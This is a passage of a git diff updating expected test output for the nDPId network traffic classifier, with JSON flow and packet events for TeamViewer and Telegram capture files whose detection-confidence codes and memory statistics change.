00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":520136,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":520136,"pkt":"UlQAEjUCCAAns+YuCABFAAB8z5cAAEARYKoKAAIPXS\/g8YZxjMUAaPehAAAAAAAAAAAAAAMXJEdQAAUAAAAAAAAAAAAAADkzLjQ3LjIyNC4yNDEAAADFjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":520148,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":520148,"pkt":"CAAns+YuUlQAEjUCCABFAAB8FPQAAEARG05dL+DxCgACD4zFhnEAaPihAAAAAAAAAAAAAAMXJEdQAAUAAAAAAAAAAAAAADkzLjQ3LjIyNC4yNDEAAADEjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 01045{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":520160,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":520160,"pkt":"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"} -00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":520136,"flow_last_seen":520160,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":420,"midstream":0,"thread_ts_msec":520160,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 
+00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":520136,"flow_last_seen":520160,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":420,"midstream":0,"thread_ts_msec":520160,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1283,"source":"teamviewer.pcap","alias":"nDPId-test","packets-captured":1283,"packets-processed":1282,"total-skipped-flows":0,"total-l4-payload-len":643545,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":633881} 
-00924{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1009,"flow_first_seen":520136,"flow_last_seen":558067,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":520494,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":330297,"flow_last_seen":729854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":125458,"flow_avg_l4_payload_len":434,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 
+00924{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1009,"flow_first_seen":520136,"flow_last_seen":558067,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":520494,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":330297,"flow_last_seen":729854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":125458,"flow_avg_l4_payload_len":434,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 
00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","packets-captured":1298,"packets-processed":1298,"total-skipped-flows":0,"total-l4-payload-len":645952,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":729854} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1298/1298 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5908162 bytes -~~ total memory freed........: 5908162 bytes -~~ total allocations/frees...: 119417/119417 +~~ total memory allocated....: 6041796 bytes +~~ total memory freed........: 6041796 bytes +~~ total allocations/frees...: 122179/122179 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 450 chars ~~ json string max len.......: 1050 chars diff --git a/test/results/telegram.pcap.out b/test/results/telegram.pcap.out index 8a27fd582..0622785df 100644 --- a/test/results/telegram.pcap.out +++ b/test/results/telegram.pcap.out 
@@ -2,101 +2,101 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1588779596451} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596451,"flow_last_seen":1588779596451,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1588779596451,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00821{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1588779596451,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1588779596451,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzGJVAAEARYHzAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGANsCwWgAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 
-00718{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596451,"flow_last_seen":1588779596451,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1588779596451,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} +00718{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596451,"flow_last_seen":1588779596451,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1588779596451,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1588779596464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779596464,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACavyQAAAERSFfAqAE17\/\/\/+tQiB2wAhkPyTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1588779596464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1588779596464,"pkt":"AQBeAAD7wJrQLWJ0CABFAABJuJEAAAERXjrAqAE14AAA+xTpFOkANQuaAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"} 
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} +00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596464,"flow_last_seen":1588779596464,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1588779596464,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596465,"flow_last_seen":1588779596465,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1588779596465,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1588779596465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1588779596465,"pkt":"AQBeAAD7eCjKBfrMCABFAAFTehJAAAERW5\/AqAFF4AAA+xTpFOkBP9DmAACEAAAAAAEAAAADEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAABAAAAeAAvEXNvbm9zNzgyOENBMDVGQUNDEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MQX3Nwb3RpZnktY29ubmVjdARfdGNwBWxvY2FsAAAQgAEAABGUAB0LVkVSU0lPTj0xLjAQQ1BhdGg9L3Nwb3RpZnl6YxFzb25vczc4MjhDQTA1RkFDQxBfc3BvdGlmeS1jb25uZWN0BF90Y3AFbG9jYWwAACGAAQAAAHgAHwAAAAAFeBFzb25vczc4MjhDQTA1RkFDQwVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MFbG9jYWwAAAGAAQAAAHgABMCoAUU="} -00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596465,"flow_last_seen":1588779596465,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1588779596465,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} 
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596465,"flow_last_seen":1588779596465,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1588779596465,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779596708,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1588779596708,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1588779596708,"pkt":"AQBeAAD7jP5XIzfkCABFAACAA9gAAP8RFKbAqAFL4AAA+xTpFOkAbODJAACEAAAAAAEAAAABBV9kYWNwBF90Y3AFbG9jYWwAAAwAAQAAAAAAHxxpVHVuZXNfQ3RybF80QUJCMzlBNDFFRUZERUIzwAwAACkFoAAAEZQAEgAEAA4A2a7+VyM35Iz+VyM35A=="} 
-00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779596708,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_dacp._tcp.local"}} +00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779596708,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_dacp._tcp.local"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779596708,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1588779596708,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"thread_ts_msec":1588779596708,"pkt":"MzMAAAD7jP5XIzfkht1gD8IfAGwR\/\/6AAAAAAAAABLoJGngX4xj\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsHDYAAIQAAAAAAQAAAAEFX2RhY3AEX3RjcAVsb2NhbAAADAABAAAAAAAfHGlUdW5lc19DdHJsXzRBQkIzOUE0MUVFRkRFQjPADAAAKQWgAAARlAASAAQADgDZrv5XIzfkjP5XIzfk"} -00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779596708,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_dacp._tcp.local"}} +00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779596708,"flow_last_seen":1588779596708,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779596708,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_dacp._tcp.local"}} 
00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1588779597257,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1588779597257,"pkt":"AQBeAAD7jP5XIzfkCABFAADbeQgAAP8RnxrAqAFL4AAA+xTpFOkAx\/OHAAAAAAAFAAAAAQABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEIX2FpcnBsYXnAHAAMgAEFX3Jhb3DAHAAMgAEcaVR1bmVzX0N0cmxfNEFCQjM5QTQxRUVGREVCMwVfZGFjcMAcAP+AAcBWACEAAQAAAHgAFwAAAADHIw5HYWJyaWVsZXMtaVBhZMAhAAApBaAAABGUABIABAAOANqu\/lcjN+SM\/lcjN+Q="} 